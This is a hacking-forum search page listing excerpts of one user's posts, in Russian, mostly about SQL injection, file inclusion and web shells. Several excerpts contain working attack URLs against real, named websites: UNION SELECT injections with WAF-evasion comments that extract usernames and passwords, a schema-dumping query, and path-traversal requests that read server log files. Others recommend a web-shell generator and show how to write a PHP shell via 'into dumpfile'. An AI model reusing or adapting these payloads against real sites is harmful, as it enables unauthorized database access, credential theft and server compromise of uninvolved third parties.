 |
 |
 | |
 | |
| |
 |
 |
FORUMS | |
MEMBERS | |
RECENT POSTS |  |
LOG IN |
|
||||||
|
Показано с 1 по 25 из 81.
На поиск затрачено 0.00 сек. Поиск: Сообщения от: Mister_Bert0ni |
Раздел: Уязвимости
06.04.2017, 13:47
|
|
Ответов: 4
Просмотров: 14,723
Автор
Mister_Bert0ni
|
|
Раздел: Уязвимости
23.11.2016, 19:26
|
|
Ответов: 1,146
Просмотров: 585,522
Автор
Mister_Bert0ni
.SpoilerTarget" type="button">Spoiler:....SpoilerTarget" type="button">Spoiler: Список_параметров_для_фаззинга --level=2 // фазит Cookie header --level=3 // фазит User-Agent header, и Refererзаголовки --level=5 // фазит Host header... |
|
Раздел: Задания/Квесты/CTF/Конкурсы
20.04.2016, 16:35
|
|
Ответов: 5
Просмотров: 12,606
Автор
Mister_Bert0ni
|
|
Раздел: Песочница
19.04.2016, 13:41
|
|
Ответов: 14
Просмотров: 5,806
Автор
Mister_Bert0ni
https://github.com/b374k/b374k
Не большой...https://github.com/b374k/b374k Не большой выбор тем при генерации веб шелла но имхо этого достаточно...Свой пасс.Сжатие.Base64 encode. Функционал очень нравится. ... |
|
Раздел: Песочница
27.03.2016, 22:30
|
|
Ответов: 0
Просмотров: 2,281
Автор
Mister_Bert0ni
Еще пару лет назад устройства радиоперехвата были...Еще пару лет назад устройства радиоперехвата были дорогими, сложными и были доступны только спецслужбам и промышленным шпионам. Однако появление массовых и дешевых SDR делает их доступными... |
|
Раздел: Песочница
27.03.2016, 20:23
|
|
Ответов: 68
Просмотров: 98,844
Автор
Mister_Bert0ni
|
|
Раздел: Этичный хакинг или пентестинг
18.03.2016, 18:47
|
|
Ответов: 30
Просмотров: 27,150
Автор
Mister_Bert0ni
А какие ж тут доки?Строковое представление...А какие ж тут доки?Строковое представление символов в MySQL запросе с помощью escape символа. Подробнее можно тут почитать: http://www.mysql.ru/docs/man/String_syntax.html |
|
Раздел: Этичный хакинг или пентестинг
18.03.2016, 18:35
|
|
Ответов: 30
Просмотров: 27,150
Автор
Mister_Bert0ni
|
|
Раздел: Этичный хакинг или пентестинг
18.03.2016, 18:32
|
|
Ответов: 30
Просмотров: 27,150
Автор
Mister_Bert0ni
http://ethicalhacking786.blogspot.com/2015/04/Waf-...http://ethicalhacking786.blogspot.com/2015/04/Waf-bypass-methods.html |
|
Раздел: Уязвимости
04.08.2015, 16:09
|
|
Ответов: 264
Просмотров: 282,901
Автор
Mister_Bert0ni
www.meleeboys.com/index.php?option=com_s5clanroste...www.meleeboys.com/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/concat(username,' ',password),222+from+jos_users--%20-... |
|
Раздел: Уязвимости
16.07.2015, 15:28
|
|
Ответов: 264
Просмотров: 282,901
Автор
Mister_Bert0ni
http://www.compactkitchens.in/productdetail.php?ca...http://www.compactkitchens.in/productdetail.php?cat_id=.37' and @pipka:=( (SELECT+GROUP_CONCAT(/*!12345table_name*/,0x2020203a3a3a2020,/*!12345column_name*/+SEPARATOR+0x3c62723e)+FROM+... |
|
Раздел: Песочница
17.06.2015, 01:03
|
|
Ответов: 0
Просмотров: 1,889
Автор
Mister_Bert0ni
Подскажите где можно глянуть примеры эксплуатации...Подскажите где можно глянуть примеры эксплуатации уязвимости SPDY heap buffer overflow CWE (https://antichat.live/) CWE-122 (https://antichat.live/) CVE (https://antichat.live/)... |
|
Раздел: Уязвимости
06.06.2015, 22:42
|
|
Ответов: 2,955
Просмотров: 996,235
Автор
Mister_Bert0ni
если я првильно понял то при ввборке из базы я...если я првильно понял то при ввборке из базы я никак не смогу внедрить апдейт или инсерт?Смогу поменять пароль только если есть кнопка забыли пароль и я смогу вытянуть токен которыц отсылаеться на... |
|
Раздел: Уязвимости
06.06.2015, 15:34
|
|
Ответов: 2,955
Просмотров: 996,235
Автор
Mister_Bert0ni
|
|
Раздел: Уязвимости
04.06.2015, 21:19
|
|
Ответов: 2,955
Просмотров: 996,235
Автор
Mister_Bert0ni
Всем привет. Банальный вопрос:Если есть...Всем привет. Банальный вопрос:Если есть регистрация на сайте то значит сайт как то пишет регистрационные данные в базу.Но уязвимость sql в другом скрипте,например в index.php в параметре id.Так вот... |
|
Раздел: Песочница
02.06.2015, 19:41
|
|
Ответов: 39
Просмотров: 11,161
Автор
Mister_Bert0ni
Если я не ошибаюсь то MITM актуальна в одном...Если я не ошибаюсь то MITM актуальна в одном сегменте сети...Если все было так просто то все бы были богачами)) |
|
Раздел: Песочница
31.05.2015, 19:36
|
|
Ответов: 1
Просмотров: 3,244
Автор
Mister_Bert0ni
Люди добрые и люди умные а подскажите новенькому...Люди добрые и люди умные а подскажите новенькому как эксплуатируется SQL inj (AJAX,JSON,JQUERY) ???? Решил пройти bWAPP (http://www.itsecgames.com/) и запарился на этом типе SQLi .Google мучал... |
|
Раздел: Песочница
31.05.2015, 02:34
|
|
Ответов: 348
Просмотров: 354,905
Автор
Mister_Bert0ni
http://ankontr.if.ua/?a_id=6395&page=../../../../....http://ankontr.if.ua/?a_id=6395&page=../../../../../../var/log/lastlog� http://ankontr.if.ua/?a_id=6395&page=../../../../../var/run/utmp�... |
|
Раздел: Песочница
31.05.2015, 01:38
|
|
Ответов: 15
Просмотров: 3,349
Автор
Mister_Bert0ni
|
|
Раздел: Песочница
31.05.2015, 01:09
|
|
Ответов: 348
Просмотров: 354,905
Автор
Mister_Bert0ni
Сосдай пейлоад с возможными путями...Сосдай пейлоад с возможными путями /threads/324564/ (https://antichat.live/threads/324564/) и пройтись Burp Suite в Intruder-e Вот конфиг апача ... |
|
Раздел: Песочница
31.05.2015, 00:27
|
|
Ответов: 15
Просмотров: 3,349
Автор
Mister_Bert0ni
Да с формой из pwd все было понятно кроме того...Да с формой из pwd все было понятно кроме того для чего в форму передавали GET_ом shell) Вопрос возник по синтаксису PHP $${@command()} В любом случае спасибо большое. И хотел спросить... |
|
Раздел: Кухня
30.05.2015, 01:24
|
|
Ответов: 45
Просмотров: 53,444
Автор
Mister_Bert0ni
Что такое CloudFlare?
CloudFlare – это...Что такое CloudFlare? CloudFlare – это сервис по обслуживанию и обеспечению безопасности. Часто различные сайты прячут за ним свой реальный IP. ... |
|
Раздел: Песочница
29.05.2015, 23:04
|
|
Ответов: 15
Просмотров: 3,349
Автор
Mister_Bert0ni
Где можно про RCE в PHP почитать?Можеть есть...Где можно про RCE в PHP почитать?Можеть есть какие то мануалы? Если не сложно можно в кратце обьяснить что какой фрагмент кода делает? [CODE] |
|
Раздел: Песочница
28.05.2015, 22:26
|
|
Ответов: 3
Просмотров: 3,016
Автор
Mister_Bert0ni
Спасибо за одобрение)
Буду стараться еще...Спасибо за одобрение) Буду стараться еще подобные посты делать. |
|
Раздел: Песочница
28.05.2015, 22:23
|
|
Ответов: 15
Просмотров: 3,349
Автор
Mister_Bert0ni
А пробовал так:
union select...А пробовал так: union select null,null,(hex()),null,....,null into dumpfile /ful_path/writable_dir/shell.php union select null,null,(hex()),null,....,null into outfile... |
| Показано с 1 по 25 из 81. |
